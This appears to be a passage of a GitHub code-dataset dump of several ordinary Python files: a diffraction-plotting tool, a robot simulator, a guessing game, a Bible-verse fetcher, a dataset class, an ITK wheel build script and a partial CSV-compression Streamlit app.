hide=options.quiet)\n lines.nomove = options.nomove\n lines.normalize = options.normalize_all\n lines.linewidth = options.linewidth\n lines.savefig = options.savefig\n\n if plt.get_backend() == 'TkAgg':\n # tight layout, smaller gray border\n fig.tight_layout(rect=(0, 0, 1, 1))\n\n if options.quiet or options.fixsls or options.monitor:\n pass\n elif options.bg_correct:\n if not bg_data:\n bg_data = setup_interpolate_background(data[0])\n bg = Background(fig, d=bg_data, bg_correct=options.bg_correct, quiet=options.quiet,\n out=options.bg_output, topas_bg=options.topas_bg, xrs=options.xrs)\n elif options.backgrounder:\n bg = Background(fig, d=bg_data, quiet=options.quiet,\n topas_bg=options.topas_bg, xrs=options.xrs)\n\n if options.crplo:\n f_crplo()\n\n if prf: # fullprof profile files\n for fn in prf:\n f_prf(fn)\n\n if options.compare:\n if options.compare_reference:\n ref = read_data(options.compare_reference)\n lines.plot(ref, lw=lines.linewidth*2)\n else:\n ref = None\n\n kind = options.compare-1\n f_compare(data, kind=kind, reference=ref)\n\n if options.plot_ticks_scaled:\n for fn in options.plot_ticks_scaled:\n d = read_data(fn, savenpy=False)\n lines.plot_ticks_scaled(d)\n\n if options.quiet:\n pass\n else:\n for d in reversed(data):\n lines.plot(d)\n\n if options.plot_uvw:\n d = calc_fwhm(options.plot_uvw)\n lines.plot(d)\n\n if options.plot_ticks:\n for i, hkl_file in enumerate(options.plot_ticks):\n col = 4 if options.plot_ticks == 'hkl.dat' else options.plot_ticks_col - \\\n 1\n ticks = load_tick_marks(hkl_file, col=col)\n if ticks:\n lines.plot_tick_marks(ticks, i=i)\n\n if options.weighted_ydiff:\n try:\n xyobs = read_data('x_yobs.xy')\n xycalc = read_data('x_ycalc.xy')\n xyerr = read_data('x_yerr.xy')\n except OSError as e:\n print(e)\n print()\n print(\"\"\"Please add the following lines to the TOPAS input file to generate the needed files:\n Out_X_Yobs(x_yobs.xy)\n Out_X_Ycalc(x_ycalc.xy)\n Out_X_Yerr(x_yerr.xy)\n \"\"\")\n exit(0)\n f_plot_weighted_difference(xyobs, xycalc, xyerr, lw=options.linewidth)\n\n if options.topas_bg:\n try:\n xyobs = read_data('x_yobs.xy')\n xycalc = read_data('x_ycalc.xy')\n xydiff = read_data('x_ydiff.xy')\n except OSError as e:\n print(e)\n print()\n print(\"\"\"Please add the following lines to the TOPAS input file to generate the needed files:\n Out_X_Yobs(x_yobs.xy)\n Out_X_Ycalc(x_ycalc.xy)\n Out_X_Difference(x_ydiff.xy)\n \"\"\")\n exit(0)\n\n f_plot_topas_special(\n xyobs, xycalc, xydiff, bg_data, lw=options.linewidth)\n # specifying bg.xycalc and bg.xyobs is necessary to update the Rp value\n # on every step\n bg.xycalc = xycalc\n bg.xyobs = data[0]\n\n if options.stepco:\n assert bg_data, \"No background data available, can't use option --stepco!\"\n\n lines.plot(bg_data)\n f_plot_stepco_special(bg_data.xy)\n\n if options.bin:\n for d in reversed(data):\n dbinned = d.bin(options.bin)\n dbinned.print_pattern()\n lines.plot(dbinned)\n\n if options.smooth:\n for d in reversed(data):\n dsmooth = d.smooth(options.smooth) # smoothing performed in place\n dsmooth.print_pattern()\n lines.plot(dsmooth)\n\n if options.boxes:\n lines.plot_boxes(options.boxes)\n\n if options.quiet or not options.show:\n pass\n elif not sys.stdin.isatty():\n plot_stdin(fig)\n elif options.monitor:\n if options.monitor in ('crplot.dat', 'crplot'):\n f_monitor('crplot.dat', crplot_init, crplot_update, fig=fig)\n elif options.monitor.endswith('.prf'):\n f_monitor(options.monitor, f_prf_init, f_prf_update, fig=fig)\n\n else:\n fn = options.monitor\n f_monitor(fn, plot_init, plot_update, fig=fig)\n elif options.savefig:\n plt.legend()\n out = options.savefig\n plt.savefig(out, bbox_inches=0)\n else:\n plt.legend()\n plt.show()\n\n if options.bg_correct:\n f_bg_correct_out(\n d=data[0], bg_xy=bg.xy.T, kind=options.bg_correct, offset=options.bg_offset)\n\n try:\n if bg.xy.any():\n drc = os.path.dirname(data[0].filename)\n bg.printdata(fout=os.path.join(drc,'lines.out'))\n except UnboundLocalError:\n pass\n\ndef main():\n if len(sys.argv) > 1 and sys.argv[1] == \"gui\":\n from . import lines_gui\n lines_gui.run()\n else:\n run_script()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stefsmeets/lines","sub_path":"lines/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":79205,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"31802993415","text":"import math\nimport numpy as np\n\n\nclass ClassRobot(object):\n def __init__(self, dt=0.002):\n self.dt = dt\n self.r = 0.05\n self.l = 0.09\n self.kr = 0.02\n self.kl = 0.02\n self.pose = np.array([0, 0, 0])\n self.pose_estimated = self.pose\n self.controller_pd = 1\n self.controller_pt = 10\n self.w_sat = 13\n self.estimated_Sigma = np.zeros((3, 3))\n\n def run(self, w_r, w_l):\n \"\"\"\n Simulate the real robot\n Args:\n w_r ([float]): [control signal angular velocity(rad/s) of right wheels]\n w_l ([float]): [control signal angular velocity(rad/s) of left wheels]\n Returns:\n None\n \"\"\"\n delta_distance = self.dt * self.r * (w_r + w_l) / 2\n delta_theta = self.dt * self.r * (w_r - w_l) / self.l\n theta = self.pose[2]\n J = (\n self.r\n * self.dt\n / 2\n * np.array(\n [\n [math.cos(theta), math.cos(theta)],\n [math.sin(theta), math.sin(theta)],\n [2 / self.l, -2 / self.l],\n ]\n )\n )\n Sigma = np.array([[self.kr * abs(w_r), 0], [0, self.kl * abs(w_l)]])\n Q = J @ Sigma @ J.T\n Noise = np.random.multivariate_normal(np.array([0, 0, 0]).T, Q, (1))\n Noise = Noise.reshape(3)\n\n self.pose = (\n self.pose\n + np.array(\n [\n math.cos(theta) * delta_distance,\n math.sin(theta) * delta_distance,\n delta_theta,\n ]\n )\n + Noise\n )\n\n def controller(self, goal):\n \"\"\"\n P controller\n Args:\n goal ([tuple]): [desired location (x,y)]\n Returns:\n dd ([float]): [distance error]\n w_r ([float]): [desired control signal of right wheels]\n w_l ([float]): [desired control signal of left wheels]\n \"\"\"\n dx = goal[0] - self.pose_estimated[0]\n dy = goal[1] - self.pose_estimated[1]\n dd = np.sqrt(dx ** 2 + dy ** 2)\n dtheta = math.atan2(dy, dx) - self.pose_estimated[2]\n dtheta = self._wrap_to_pi(dtheta)\n # if dtheta > math.pi:\n # dtheta = dtheta - 2 * math.pi\n # elif dtheta < -math.pi:\n # dtheta = dtheta + 2 * math.pi\n v_d = dd * self.controller_pd\n w_d = dtheta * self.controller_pt\n w_r = (v_d + self.l * w_d / 2) / self.r\n w_l = (v_d - self.l * w_d / 2) / self.r\n if w_r >= self.w_sat:\n rat = self.w_sat / w_r\n w_r = self.w_sat\n w_l = w_l * rat\n if w_l >= self.w_sat:\n rat = self.w_sat / w_l\n w_l = self.w_sat\n w_r = w_r * rat\n return dd, w_r, w_l\n\n def estimater(self, w_r, w_l):\n \"\"\"\n Location estimater\n Args:\n w_r ([float]): [control signal angular velocity(rad/s) of right wheels]\n w_l ([float]): [control signal angular velocity(rad/s) of left wheels]\n Returns:\n None\n \"\"\"\n delta_distance = self.dt * self.r * (w_r + w_l) / 2\n delta_theta = self.dt * self.r * (w_r - w_l) / self.l\n theta = self.pose_estimated[2]\n J = (\n self.r\n * self.dt\n / 2\n * np.array(\n [\n [math.cos(theta), math.cos(theta)],\n [math.sin(theta), math.sin(theta)],\n [2 / self.l, -2 / self.l],\n ]\n )\n )\n Sigma_delta = np.array([[self.kr * abs(w_r), 0], [0, self.kl * abs(w_l)]])\n Q = J @ Sigma_delta @ J.T\n H = np.array(\n [\n [1, 0, -delta_distance * math.sin(theta)],\n [0, 1, delta_distance * math.cos(theta)],\n [0, 0, 1],\n ]\n )\n\n self.estimated_Sigma = H @ self.estimated_Sigma @ H.T + Q\n self.pose_estimated = self.pose_estimated + np.array(\n [\n math.cos(theta) * delta_distance,\n math.sin(theta) * delta_distance,\n delta_theta,\n ]\n )\n self.pose_estimated[2] = self._wrap_to_pi(self.pose_estimated[2])\n\n def reset(self, dt=0.002):\n self.dt = dt\n self.r = 0.05\n self.l = 0.09\n self.kr = 0.01\n self.kl = 0.01\n self.pose = np.array([0, 0, 0])\n self.pose_estimated = self.pose\n self.controller_pd = 1\n self.controller_pt = 10\n self.w_sat = 13\n self.estimated_Sigma = np.zeros((3, 3))\n\n def _wrap_to_pi(self, theta):\n while theta > math.pi:\n theta = theta - 2 * math.pi\n while theta < -math.pi:\n theta = theta + 2 * math.pi\n return theta\n\n\nif __name__ == \"__main__\":\n robot = ClassRobot()\n # dt, w_r, w_l = robot.controller((1, 1))\n # robot.run(w_r, w_l)\n # while dt >= 0.1:\n # dt, w_r, w_l = robot.controller((1, 1))\n # robot.run(w_r, w_l)\n # robot.estimater(w_r, w_l)\n # print(robot.pose)\n # print(robot.pose_estimated)\n","repo_name":"gitAugust/Mobile_Robot_Simulator","sub_path":"model_mobile_robot.py","file_name":"model_mobile_robot.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41291465382","text":"from random import randint\r\nfrom time import sleep\r\n\r\ndef replay():\r\n i = input(\"Do you wish to play again type Y to continue or N to not : \").lower()\r\n if i == \"y\":\r\n ti()\r\n else:\r\n sleep(2)\r\n exit()\r\n\r\ndef task(l , h):\r\n no = randint(l , h)\r\n chances = round((h+l)/2)\r\n print(f\"You have {chances} chances to find the number\")\r\n while chances != 0:\r\n chances -= 1\r\n print(f\"You have {chances} chances left\")\r\n try:\r\n guess = int(input(\"Guess the number : \"))\r\n except:\r\n print(\"Pease enter number only\")\r\n chances += 1\r\n continue\r\n if guess == no:\r\n print(\"Congratulations !! \\n You Win !! \\n Do you wish to play again ?\")\r\n replay()\r\n elif no - guess >= 1 and no - guess <= 5:\r\n print(\"Too close\")\r\n elif guess - no >= 1 and guess - no <= 5:\r\n print(\"Too close\")\r\n elif chances == 0 and guess != no:\r\n print(f\"You loose!! \\n The number was {no} \\n Better luck next time... \\n Would you like to play again\")\r\n replay()\r\n else:\r\n print(\"That is not the number\")\r\n\r\ndef checking(l , h):\r\n if l == 0 and h == 0:\r\n print(\"Both the numbers cant be 0\")\r\n ti()\r\n elif l > h:\r\n print(\"Lower number cant be greater than higher number\")\r\n ti()\r\n elif l == h:\r\n print(\"Both the numbers cant be equal.\")\r\n ti()\r\n elif l < h and h - l == 10:\r\n task(l , h)\r\n elif l < h and h - l > 10:\r\n task(l , h)\r\n else:\r\n print(\"There should be minimum gap of 10 between higher and lower number\")\r\n ti()\r\n\r\ndef ti():\r\n ln = input(\"Enter the lower number : \")\r\n hn = input(\"Enter the higher number : \")\r\n if ln == \"\" and hn == \"\":\r\n print(\"Please enter some numbers\")\r\n ti()\r\n elif ln == \"\" and hn != \"\":\r\n ln = \"0\"\r\n elif ln != \"\" and hn == \"\":\r\n hn = \"0\"\r\n try:\r\n ln = int(ln)\r\n hn = int(hn)\r\n checking(ln , hn)\r\n except:\r\n print(\"You should only enter integer values\")\r\n\r\ndef wish():\r\n print(\"Welcome to guessing game !!\")\r\n print(\"In this game you have to provide the computer a range , then the computer will select a random number between that range , you have to guess number.\")\r\n ti()\r\n\r\nwish()\r\n","repo_name":"PrgrammerDSP/Number-Guessing-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9608225838","text":"import random\nimport requests\n'''\nfile to handle getting of bible verses\nupdate the list of possible verses in bible_verses.txt (1 per line)\n'''\n\ndef load_verses(filename):\n '''\n loads verses into a list from a file\n '''\n output = []\n with open(filename) as file:\n line = file.readline().strip()\n while line != \"\":\n output.append(line)\n line = file.readline().strip()\n return output\n\n\ndef get_verse(verse):\n '''\n actually queries the bible api thing to get the verse\n '''\n return requests.get(\"https://bible-api.com/{0}\".format(verse)).json()\n\ndef get_random_verse(filename):\n '''\n this is the useful function - gets a random verse from the file and returns it\n '''\n possible_verses = load_verses(filename)\n name = possible_verses[random.randint(0,len(possible_verses)-1)]\n return get_verse(name)\n","repo_name":"CWright2022/receipt_planner","sub_path":"bible_verses.py","file_name":"bible_verses.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22346080451","text":"from typing import Tuple, Sequence, Union\n\nimport numpy as np\nimport pandas as pd\n\n\nclass Dataset:\n def __init__(self, X: np.ndarray, y: np.ndarray = None, features: Sequence[str] = None, label: str = None) -> None:\n \"\"\"\n Dataset represents a tabular dataset for single output classification.\n\n Parameters\n ----------\n X: numpy.ndarray (n_samples, n_features)\n The feature matrix\n y: numpy.ndarray (n_samples, 1)\n The label vector\n features: list of str (n_features)\n The feature names\n label: str (1)\n The label name\n \"\"\"\n if X is None:\n raise ValueError(\"X cannot be None\")\n if y is not None and len(X) != len(y):\n raise ValueError(\"X and y must have the same length\")\n if features is not None and len(X[0]) != len(features):\n raise ValueError(\"Number of features must match the number of columns in X\")\n if features is None:\n features = [f\"feat_{str(i)}\" for i in range(X.shape[1])]\n if y is not None and label is None:\n label = \"y\"\n self.X = X\n self.y = y\n self.features = features\n self.label = label\n\n def shape(self) -> Tuple[int, int]:\n \"\"\"\n Returns the shape of the dataset\n Returns\n -------\n tuple (n_samples, n_features)\n \"\"\"\n return self.X.shape\n\n def has_label(self) -> bool:\n \"\"\"\n Returns True if the dataset has a label\n Returns\n -------\n bool\n \"\"\"\n return self.y is not None\n\n def get_classes(self) -> np.ndarray:\n \"\"\"\n Returns the unique classes in the dataset\n Returns\n -------\n numpy.ndarray (n_classes)\n \"\"\"\n if self.has_label():\n return np.unique(self.y)\n else:\n raise ValueError(\"Dataset does not have a label\")\n\n def get_mean(self) -> np.ndarray:\n \"\"\"\n Returns the mean of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmean(self.X, axis=0)\n\n def get_variance(self) -> np.ndarray:\n \"\"\"\n Returns the variance of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanvar(self.X, axis=0)\n\n def get_median(self) -> np.ndarray:\n \"\"\"\n Returns the median of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmedian(self.X, axis=0)\n\n def get_min(self) -> np.ndarray:\n \"\"\"\n Returns the minimum of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmin(self.X, axis=0)\n\n def get_max(self) -> np.ndarray:\n \"\"\"\n Returns the maximum of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmax(self.X, axis=0)\n\n def summary(self) -> pd.DataFrame:\n \"\"\"\n Returns a summary of the dataset\n Returns\n -------\n pandas.DataFrame (n_features, 5)\n \"\"\"\n data = {\n \"mean\": self.get_mean(),\n \"median\": self.get_median(),\n \"min\": self.get_min(),\n \"max\": self.get_max(),\n \"var\": self.get_variance()\n }\n return pd.DataFrame.from_dict(data, orient=\"index\", columns=self.features)\n\n#Exercício 2.1\n\n def dropna (self):\n\n identificar = np.all(~np.isnan(self.X), axis=1) # np.isnan(self.X) Obtenho um boleano com os verdadeiros sendo iguais a NA mas o ~inverte a logica e agora quando é igual a NA, é falso. Na função toda, obtenho um boleano sendo os verdadeiros, as linhas que nao tem nenhum NA.\n self.X = self.X[identificar] #Nova matriz ondas as linhas de identificar são true. Removo as linhas falsas\n self.y = self.y[identificar] #Removo os rotulas das amostras que forem falsas.\n\n return self\n\n#Exercício 2.2\n\n def fillna (self, valor):\n identificar = np.isnan(self.X) #Boleano em que os valores de NA são considerados verdadeiros.\n\n if valor == \"mean\":\n média = np.nanmean(self.X, axis=0) #faz a média, ignorando os valores de NA\n self.X = np.where(identificar, média, self.X) # identificar é a matriz boleana em que os seus valores true são substituidos pela média. Self.X é a matriz original em que se o elemento for false, o valor vai se manter\n\n elif valor == \"median\":\n mediana = np.nanmedian(self.X, axis=0) #faz a mediana, ignorando os valores de NA\n self.X = np.where(identificar, mediana, self.X) # substitui os valores True pela mediana\n\n else:\n self.X[identificar] = valor\n\n return self\n \n#Exercício 2.3\n \n def remove_by_index (self, index):\n self.X = np.delete(self.X, index, axis = 0) #vai ser removida a linha correspondente ao index. Aqui o axis= 0 é a linha e axis = 1 é a coluna\n self.y = np.delete(self.y, index) #vai ser removido o rotulo correspondente a esta linha (amostra)\n return self\n\n @classmethod\n def from_dataframe(cls, df: pd.DataFrame, label: str = None):\n \"\"\"\n Creates a Dataset object from a pandas DataFrame\n\n Parameters\n ----------\n df: pandas.DataFrame\n The DataFrame\n label: str\n The label name\n\n Returns\n -------\n Dataset\n \"\"\"\n if label:\n X = df.drop(label, axis=1).to_numpy()\n y = df[label].to_numpy()\n else:\n X = df.to_numpy()\n y = None\n\n features = df.columns.tolist()\n return cls(X, y, features=features, label=label)\n\n def to_dataframe(self) -> pd.DataFrame:\n \"\"\"\n Converts the dataset to a pandas DataFrame\n\n Returns\n -------\n pandas.DataFrame\n \"\"\"\n if self.y is None:\n return pd.DataFrame(self.X, columns=self.features)\n else:\n df = pd.DataFrame(self.X, columns=self.features)\n df[self.label] = self.y\n return df\n\n @classmethod\n def from_random(cls,\n n_samples: int,\n n_features: int,\n n_classes: int = 2,\n features: Sequence[str] = None,\n label: str = None):\n \"\"\"\n Creates a Dataset object from random data\n\n Parameters\n ----------\n n_samples: int\n The number of samples\n n_features: int\n The number of features\n n_classes: int\n The number of classes\n features: list of str\n The feature names\n label: str\n The label name\n\n Returns\n -------\n Dataset\n \"\"\"\n X = np.random.rand(n_samples, n_features)\n y = np.random.randint(0, n_classes, n_samples)\n return cls(X, y, features=features, label=label)\n\n\nif __name__ == '__main__':\n X = np.array([[1, 2, 3], [4, np.nan, np.nan],[5, 10, 3]])\n y = np.array([1, 2,3])\n features = np.array(['a', 'b', 'c'])\n label = 'y'\n dataset = Dataset(X, y, features, label)\n\n#Forma como os dados estão organizados\n\n # a | b | c | y\n #-----|-----|-----|-----\n # 1 | 2 | 3 | 1\n # 4 | NA | NA | 2 \n # 5 | 10 | 3 | 3 \n\n print(dataset.X.shape[0])\n print()\n print(dataset.has_label())\n print(\"Classe:\", dataset.get_classes())\n print(dataset.get_mean())\n print(dataset.get_variance())\n print(dataset.get_median())\n print(dataset.get_min())\n print(dataset.get_max())\n print(dataset.summary())\n print()\n # dataset.dropna()\n # dataset.fillna(5)\n # print(dataset.remove_by_index(0))\n print(dataset.X)\n print(dataset.y) #Obtemos as os rotulos das labels\n\n \n \n","repo_name":"luisfsferreira/Sistemas_inteligentes","sub_path":"src/si/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"14751761294","text":"from subprocess import check_call\nimport os\nimport sys\n\nSCRIPT_DIR = os.path.dirname(__file__)\nROOT_DIR = os.path.abspath(os.getcwd())\n\n\nprint(\"SCRIPT_DIR: %s\" % SCRIPT_DIR)\nprint(\"ROOT_DIR: %s\" % ROOT_DIR)\n\nsys.path.insert(0, os.path.join(SCRIPT_DIR, \"internal\"))\n\nfrom wheel_builder_utils import push_dir, push_env\nfrom windows_build_common import DEFAULT_PY_ENVS, venv_paths\n\ndef build_wheels(py_envs=DEFAULT_PY_ENVS):\n for py_env in py_envs:\n python_executable, \\\n python_include_dir, \\\n python_library, \\\n pip, \\\n ninja_executable, \\\n path = venv_paths(py_env)\n\n with push_env(PATH=\"%s%s%s\" % (path, os.pathsep, os.environ[\"PATH\"])):\n\n # Install dependencies\n requirements_file = os.path.join(ROOT_DIR, \"requirements-dev.txt\")\n if os.path.exists(requirements_file):\n check_call([pip, \"install\", \"--upgrade\", \"-r\", requirements_file])\n check_call([pip, \"install\", \"cmake\"])\n check_call([pip, \"install\", \"scikit_build\"])\n check_call([pip, \"install\", \"ninja\"])\n\n build_type = \"Release\"\n source_path = ROOT_DIR\n itk_build_path = os.path.abspath(\"%s/ITK-win_%s\" % (os.path.join(SCRIPT_DIR, '..'), py_env))\n print('ITKDIR: %s' % itk_build_path)\n\n # Generate wheel\n check_call([\n python_executable,\n \"setup.py\", \"bdist_wheel\",\n \"--build-type\", build_type, \"-G\", \"Ninja\",\n \"--\",\n \"-DCMAKE_MAKE_PROGRAM:FILEPATH=%s\" % ninja_executable,\n \"-DITK_DIR:PATH=%s\" % itk_build_path,\n \"-DWRAP_ITK_INSTALL_COMPONENT_IDENTIFIER:STRING=PythonWheel\",\n \"-DSWIG_EXECUTABLE:FILEPATH=%s/Wrapping/Generators/SwigInterface/swig/bin/swig.exe\" % itk_build_path,\n \"-DITK_WRAP_unsigned_short:BOOL=ON\",\n \"-DBUILD_TESTING:BOOL=OFF\",\n \"-DPYTHON_EXECUTABLE:FILEPATH=%s\" % python_executable,\n \"-DPYTHON_INCLUDE_DIR:PATH=%s\" % python_include_dir,\n \"-DPYTHON_LIBRARY:FILEPATH=%s\" % python_library\n ])\n # Cleanup\n check_call([python_executable, \"setup.py\", \"clean\"])\n\nif __name__ == '__main__':\n build_wheels()\n","repo_name":"QianyeYang/ITKPythonPackage","sub_path":"scripts/windows_build_module_wheels.py","file_name":"windows_build_module_wheels.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"11940133040","text":"# ------------------------------------------------------------------------------\n# Project : The Very First Daisi Hackathon\n# File : data_compression.py\n# Create on :\n# Purpose :\n# This python file is developed for The Very First Daisi Hackathon .\n# This function will compress the csv/json and db table also.\n# I have developed csvfile compression function to compress csv file\n# ------------------------------------------------------------------------------\n#!/usr/bin/env python\n# coding: utf-8\n\n# ------------------------------------------------------------------------------\n# Call required packages\n# ------------------------------------------------------------------------------\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom pandas.errors import ParserError\nimport sys\nimport zipfile\nimport streamlit as st\nimport time\nimport os\nimport math\npd.options.mode.chained_assignment = None # default='warn'\n\n# ------------------------------------------------------------------------------\n# -- UDF's --\n# ------------------------------------------------------------------------------\n\nclass data_compression:\n def __init__(self):\n print(\"Welcome to Data Compression\")\n\n def getInputDF(self):\n return self.df_input\n\n def getCompDF(self):\n return self.df_final\n\n def convert_bytes(self,size):\n for x in ['Bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n def file_size(self,file):\n if os.path.isfile(file):\n file_info = os.stat(file)\n return self.convert_bytes(file_info.st_size),file_info.st_size\n\n def listToDict(self,b):\n s = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/'\n if b==\"b\":\n return {s[i]:i for i in range(len(s))}\n else:\n return {i:s[i] for i in range(len(s))}\n\n def base64_to_base10(self,b64dec,datatype=None):\n conversion_table = self.listToDict(\"b\")\n\n if datatype == \"f\":\n x=b64dec.split(\".\")[0]\n y=b64dec.split(\".\")[1]\n\n x_dec=0\n x_power = len(x)-1\n for x_digit in x:\n x_dec += conversion_table[x_digit]*64**x_power\n x_power -= 1\n\n y_dec,z,f=0,0,0\n y_power = len(y)-1\n for y_digit in y:\n if y_digit==\"0\" and f==0:\n z=z+1\n else:\n f=1\n y_dec += conversion_table[y_digit]*64**y_power\n y_power -= 1\n\n return str(x_dec)+\".\"+str(\"\").zfill(z)+str(y_dec)\n else:\n decimal = 0\n power = len(b64dec) -1\n for digit in b64dec:\n decimal += conversion_table[digit]*64**power\n power -= 1\n return decimal\n\n def base10_to_base64(self,decimal,datatype=None):\n conversion_table = self.listToDict(\"d\")\n\n if datatype == \"f\":\n x=int(str(decimal).split(\".\")[0])\n y=str(decimal).split(\".\")[1].strip()\n z=len(y)-len(str(int(y)))\n y=int(y)\n\n x_rem=0\n x_b64dec=''\n while(x > 0):\n x_rem = x % 64\n x_b64dec = conversion_table[x_rem] + x_b64dec\n x = x // 64\n\n y_rem=0\n y_b64dec=''\n while(y > 0):\n y_rem = y % 64\n y_b64dec = conversion_table[y_rem] + y_b64dec\n y = y // 64\n return x_b64dec+\".\"+str(\"\").zfill(z)+y_b64dec\n else:\n b64dec = ''\n remainder=0\n while(decimal > 0):\n remainder = decimal % 64\n b64dec = conversion_table[remainder] + b64dec\n decimal = decimal // 64\n return b64dec\n\n# ------------------------------------------------------------------------------\n## Function Name: file_compress\n## Input : mapping and csvfile as a first parameter and 2nd = output file\n## This is normal file compression function and this is similar to winzip/7z\n# ------------------------------------------------------------------------------\n def file_compress(self,inp_file_names, out_zip_file):\n compression = zipfile.ZIP_DEFLATED\n print(f\" *** Input File name passed for zipping - {inp_file_names}\")\n print(f' *** out_zip_file is - {out_zip_file}')\n zf = zipfile.ZipFile(out_zip_file, mode=\"w\")\n\n try:\n for file_to_write in inp_file_names:\n print(f' *** Processing file {file_to_write}')\n zf.write(file_to_write, file_to_write, compress_type=compression)\n except FileNotFoundError as e:\n print(f' *** Exception occurred during zip process - {e}')\n finally:\n zf.close()\n\n# ------------------------------------------------------------------------------\n## Function Name: csvfile_compression and Input : Csv file file full path\n## To applied 5 different algorithm to compress the csv file\n## 1.Mapping for repeated data [completed]\n## 2.Group by for repeated data\n## 3.Date values convert into int format [completed]\n## 4.Convert Base10 to Base64 for integer Values [completed]\n## 5.Concatenate all the rows and make it single text [completed]\n## final file will be compressed with normal compression function like winzip\n# ------------------------------------------------------------------------------\n def csvfile_compression(self,filepath):\n try:\n train_df=pd.read_csv(filepath)\n #msg=\"Source file's size:\"+str(train_df.size)\n df_map=[]\n df_col={col:len(train_df[col].unique()) for col in train_df.columns}\n df_dt=[train_df[col].dtypes for col in train_df.columns ]\n key_srtby=\"\"\n\n for col in train_df.columns:\n col_len=len(train_df[col].unique())\n print(\"Column Name:\",col,\"|Unique Cnt:\",col_len,\"|DataType:\",train_df[col].dtypes,\"| DateTime:\",datetime.datetime.now())\n if col_len < 3000 :\n df_unique=train_df[col].unique()\n s=\",\".join(map(str,df_unique))\n train_df[col] = train_df[col].replace(df_unique[0:int(col_len/2)],[a for a in range(int(col_len/2))])\n train_df[col] = train_df[col].replace(df_unique[int(col_len/2)-1:col_len],[a for a in range(int(col_len/2)-1,col_len)])\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n elif train_df[col].dtypes=='int64':\n #print(\"Base64 Conversion...\",train_df[col].dtypes)\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n s=\"b\"\n elif train_df[col].dtypes=='object':\n try:\n train_df[col] = pd.to_datetime(train_df[col]).view(int) // 10 ** 9\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(int(x)))\n #print(\"Date Column:\",col)\n s=\"d\"\n except (ParserError,ValueError):\n pass\n elif train_df[col].dtypes=='float64':\n train_df[col] = train_df[col].apply(lambda x: x if np.isnan(x) else self.base10_to_base64(x,\"f\"))\n s=\"f\"\n else: # or train_df[col].dtypes=='float64':\n s=\"n\"\n df_map.append(s)\n df_map.append(str(df_col))\n df_map.append(str(df_dt))\n\n print(train_df.head())\n return \"Success\",df_map,train_df\n\n except Exception as ex:\n print(\"Error:\"+str(ex))\n df=[]\n return \"Failed!...\"+str(ex),df,df\n\n def save_output_files(self,df_map,train_df,file_mapping,file_compressed,zip_file_name):\n try:\n with open(file_mapping, 'w') as f:\n f.write(\"|\".join(df_map))\n\n df_comp=[]\n for col in train_df.columns:\n s=\",\".join(map(str,train_df[col]))\n df_comp.append(s)\n\n with open(file_compressed, 'w') as f:\n f.write(\"|\".join(df_comp))\n\n file_name_list = [file_mapping, file_compressed]\n self.file_compress(file_name_list, zip_file_name)\n return \"success\"\n except Exception as ex:\n print(\"Error:\"+str(ex))\n df=[]\n return \"Failed!...\"+str(ex)\n\n\n# ------------------------------------------------------------------------------\n# Call main function using csv file as a input\n# This main function is used for testing purpose from WebUI\n# ------------------------------------------------------------------------------\ndef s_ui():\n try:\n st.set_page_config(layout = \"wide\")\n st.title(\"Data Compression\")\n st.info(\"Developed by Chinnappar & Team (R-AI)\")\n with st.expander(\"ℹ️ - About this app\", expanded=True):\n st.write(\n \"\"\"\n - Data compression is performed by a program that uses a formula/algorithm to determine how to shrink the size of the data.\n - Applied 5 different formulas/algorithms to compress pandas' dataframe and find the details below:\n - Mapping for repeated data\n - Group by for repeated data\n - Date values convert into epoch format\n - Convert Base10 to Base64 for integer Values\n - Concatenate all the rows and make it single text!\n \"\"\"\n )\n st.write(\"#### Data Compression for CSV file:\")\n file_mapping='mapping2.txt'\n file_compressed='compressed.txt'\n zip_file_name = 'output.zip'\n\n if st.button(\"Test\"):\n compression = data_compression()\n test_file=\"training_data_sales_10k.csv\"\n msg,df_map,train_df=compression.csvfile_compression(test_file)\n if \"failed\" in msg:\n st.error(msg)\n\n msg=compression.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n if \"failed\" in msg:\n st.error(msg)\n\n st.info(\"Data compression is completed for test file. Please find the details below...\")\n ftest_size,test_size=compression.file_size(test_file)\n ftmap_size,tmap_size=compression.file_size(file_mapping)\n ftcomp_size,tcomp_size=compression.file_size(file_compressed)\n ftzip_size,tzip_size=compression.file_size(zip_file_name)\n tnumber=\"{:.2%}\".format((test_size-(tcomp_size+tmap_size))/test_size)\n\n df_test=pd.read_csv(test_file)\n with st.expander(\"ℹ️ - Sample Data:\", expanded=True):\n st.write(df_test.head())\n with st.expander(\"ℹ️ - Compressed - Sample Data:\", expanded=True):\n st.write(train_df.head())\n with st.expander(\"ℹ️ - Test File Results:\", 